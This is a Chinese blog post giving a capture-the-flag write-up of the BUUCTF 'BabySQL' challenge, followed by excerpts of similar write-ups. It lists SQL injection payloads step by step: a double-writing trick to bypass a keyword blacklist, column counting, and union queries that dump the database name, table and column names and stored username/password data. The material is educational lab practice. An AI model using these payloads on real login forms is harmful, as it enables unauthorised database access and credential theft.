buuctf刷题 [极客大挑战 2019]BabySQL

已于 2024-11-29 11:35:06 修改
阅读量384 收藏 6
点赞数 9
文章标签: mysql sql 网络安全
于 2024-11-29 11:34:28 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2301_79697181/article/details/144131945
版权

打开靶场发现是sql注入题,尝试输入1',通过报错发现是单引号闭合

尝试使用万能密码:

发现是有过滤的,or被吃了,应该是过滤了or,使用双写绕过一下,发现能够成功绕过

输入:1' oorr 1=1#

判断列数:1' oorr true group by 2#

发现可能过滤了true group by,尝试都双写: 1' oorr trtrueue grgroupoup bbyy 2#

报错中没有出现true,by是正确格式,说明只过滤了by

输入:1' oorr true group bbyy 2#能够正常登入,直到第4列的时候报错,说明只有3列

判断显示位:

输入:0' union select 1,2,3#

绕过了union select,尝试双写绕过:1' ununionion seselectlect 1,2,3#

判断出显示位是2和3

经过尝试过滤了:union、select、from、where、or、by,password中的or被过滤了

爆库:1' ununionion seselectlect 1,2,database()#

爆表:1' ununionion seselectlect 1,2,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema='geek'#

爆字段:1' ununionion seselectlect 1,2,group_concat(column_name)frfromom infoorrmation_schema.columns whwhereere table_name='b4bsql'#

获取数据:1' ununionion seselectlect 1,2,group_concat(username , passwoorrd) frfromom b4bsql#

成功获取flag

云遮月~
关注
BUUCTF系列
qq_45655564的博客
07-11 576
[HCTF 2018]WarmUp 查看网页源代码,得到source.php 可以得到 <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
Buuctf Web
weixin_68029979的博客
04-24 2000
写在前面, 本人小白一枚,记录一下web做过程,部分为个人理解可能有些地方写的不够明确还请见谅。当然由于刚入手web,所以有些会没有思路,这时会参考其他佬的解过程。本文会一直更新,由于是第一次写博客,所以并不知道一篇能写多少,不管怎样会一直更新的。在解中,可能并没有说清除为什么是这样,什么要这样,其实部分我也不知道是为什么,但就是这样做,由上所说我是个小白。如果在文中,出现了只有目没有解的情况,是因为我还没有学习与之相关的知识,所以先跳过了,但总会写的。
BUUCTF [极客挑战 2019]BabySQL
m0_49025459的博客
05-15 621
打开环境看看,这一个登录界面 尝试万能密码无果,那么我们只能正常尝试注入,先判断列数 1' order by 1# 输入之后发生报错 发现这里or被过滤掉了 ,这里不论是写还是小写的or都被过滤了,但是在尝试双写绕过的时候成功了 username:admin' oorr '1'='1# password:123 这样我们就可以尝试又多少列了,但是我们在尝试的时候发现order,or,by都被过滤掉了,所以我们只能通过其他的方式进行测试。但是我们在测试的时候发现union,sel
极客挑战2019】Baby SQL
Bird&Bird
10-25 2287
1、打开BUUCTF在线评测,选择web--->【极客挑战2019】Baby SQL。 2、首先采用万能密码试一下,出错了。 3、那使用普通注入试一下,报错了,从这里可以看出过滤了 union select 。 4、接着使用双写方式绕过过滤,试一下。 username=admin&password=123456' ununionion selselectect 1 %23 从结果上看,虽然也报错了,但提示不是sql语法错误,而且我们提供的查询字段数不对。 ..
[极客挑战 2019]BabySQL--详细解析
m0_56019217的博客
11-25 1460
考察的是联合注入,但是增加了过滤。使用双写绕过。
[极客挑战 2019]BabySQL
weixin_41571993的博客
10-04 995
靶场练习
BUUCTF[极客挑战 2019]BabySQL
网络空间安全学习
06-25 2330
通过输入非0数字,能正常回显,0和字母不能正常回显,什么都没有显示。刚刚我们输入非0数字正常回显,0和字母不能正常的回显,猜测说明sql语句当中可能存在||运算符,只有输入非0数字,才会返回true,回显条件。可观察网页的源码信息,发现有check.php,猜测可能是登录界面时,输入账号和密码的跳转界面,提示信息。通过上面的过程我们不难发现,此时还存在过滤,from和where也被过滤,同理双写绕过。拿到该靶机,观察界面,存在登录说明存在可能SQL注入,根据目也可得知存在SQL注入。
[buuctf]/[极客挑战 2019]BabySQL 1
y14ffhgcg56_的博客
11-07 1792
这里出现报错,说不存在geek.Flag。根据上面我们知道存在geek这个库,和Flag这个表。但Flag这个表在ctf库下,并不在geek库下。所以可以将Flag改成ctf.Flag,表示查询数据库ctf下Flag表。下一步,进步确认闭合方式,正常步骤应该输入username=1' and 1=1 --q &password=1。(被过滤的词:and,or,by,union,select,from,where都可以用双写绕过)然后进行列数判断,又出现类似报错。接下来就是逐步的爆库,爆表,爆字段,爆内容。
buuctf[极客挑战 2019]BabySQL--联合注入、双写过滤
weixin_61060664的博客
01-10 1936
有回显: The used SELECT statements have a different number of columns。有回显:版本为:“ 10.3.18-MariaDB!1' or'1'='1 失败。有回显,字段名为flag。
BUUCTF---[极客挑战 2019]BabySQL1
2201_75556700的博客
03-03 950
1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()#使用该语句查表名时发现union,select,from,where都被过滤了。8.这里没有得到flag可能是我遗漏了什么,查了资料才发现,flag可能不在我们当前这个数据库里面,想到一开始,我还没查询库名,不知道它有几个苦命,于是使用下面命令进行数据库库名查询。使用下面命令爆第一张表的字段。
buuctf-[极客挑战 2019]BabySQL(小宇特详解)
小宇的web博客
01-19 5317
buuctf-[极客挑战 2019]BabySQL(小宇特详解) 这里看的话是一道SQL注入。 这里先尝试一下万能密码 这里发现它过滤了or(直接删除了or) 这里尝试进行双写 也就是oorr,这里删除了or后又重新构造了一个or 这里发现还是不行 这里先看一下双写union select 1 /check.php?username=admin&password=1 %27 ununionion seselectlect 1 %23 这里发现不是报错,而是列数不对 当列数为3的时候对
buuctf web [极客挑战 2019]BabySQL
m0_46412682的博客
07-16 1058
buuctf web [极客挑战 2019]BabySQL 开始的页面 随便输入用户名和密码 sql注入,先判断有多少字段 从图中可以看到select和union被过滤了,可以用双写selselectect uniunionon还有的是’单引号和#要编码变成%27 %23,先猜测4个字段,错误 3个字段,成功 ?username=admin&password=123%27ununionion selselectect 1,2,3%20%23 爆库 ?username=admin&
BUUCTF之[极客挑战 2019]BabySQL 解决方法
weixin_44632787的博客
06-17 2042
BUUCTF之[极客挑战 2019]BabySQL 解决方法 启动我们的挑战项目 emmmmm这是第三个SQL注入,应该难度又提高了一些。先试试我们的万能密码:1’ or 1=1 # 不行,报错了。而且我也看不出报错的信息是什么 然后返回前面的目看看提示信息,觉得可能这是加了一些过滤信息 所以我们试试双写看看能不能绕过防御,并且把最后面的 # 号改成 %23。 所以我们的payload为:1’ oorr 1=1 %23 发现可以获取到信息,说明我们这个方法是正确的! 然后我们再进行用ord
BUUCTF:[极客挑战 2019]BabySQL 1
羽的博客
07-22 321
输入: 1' 1 判断是单引号注入 输入: 1' order by 1# 1 发现过滤了or,by 尝试双写注入 输入: 1' oorrder bbyy 4# 1 是四列 输入: 1' ununionion seselectlect 1,database(),3# 1 输入: 1' ununionion seselectlect 1,2,group_concat(table_name) ffromrom infoorrmation_schema...
BUUCTF__[极客挑战 2019]BabySQL_
风过江南乱的博客
06-30 463
BUUCTF__[极客挑战 2019]BabySQL_
解决:MySQL client, error code: 1251, SQLState: 08004
最新发布
liulilittle的博客
05-28 330
MySQL认证协议不兼容问解决方案:客户端报错1251是由于MySQL 8.0默认使用caching_sha2_password认证方式,而旧客户端不支持。可通过修改用户认证插件为mysql_native_password解决。修复步骤:1)执行ALTER USER修改认证方式;2)FLUSH PRIVILEGES新权限。该方法可快速解决客户端连接认证失败问,适用于MySQL 8.0与旧版客户端的兼容场景。
buuctf [极客挑战 2019]Upload 1
02-07
### 关于 BUUCTF 极客挑战 2019 中 Upload 1 目分析 #### 背景介绍 BUUCTF 是一个知名的网络安全竞赛平台,其中的极客挑战系列目涵盖了多种安全漏洞利用技巧。Upload 1 属于文件上传类目,在这类目中...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值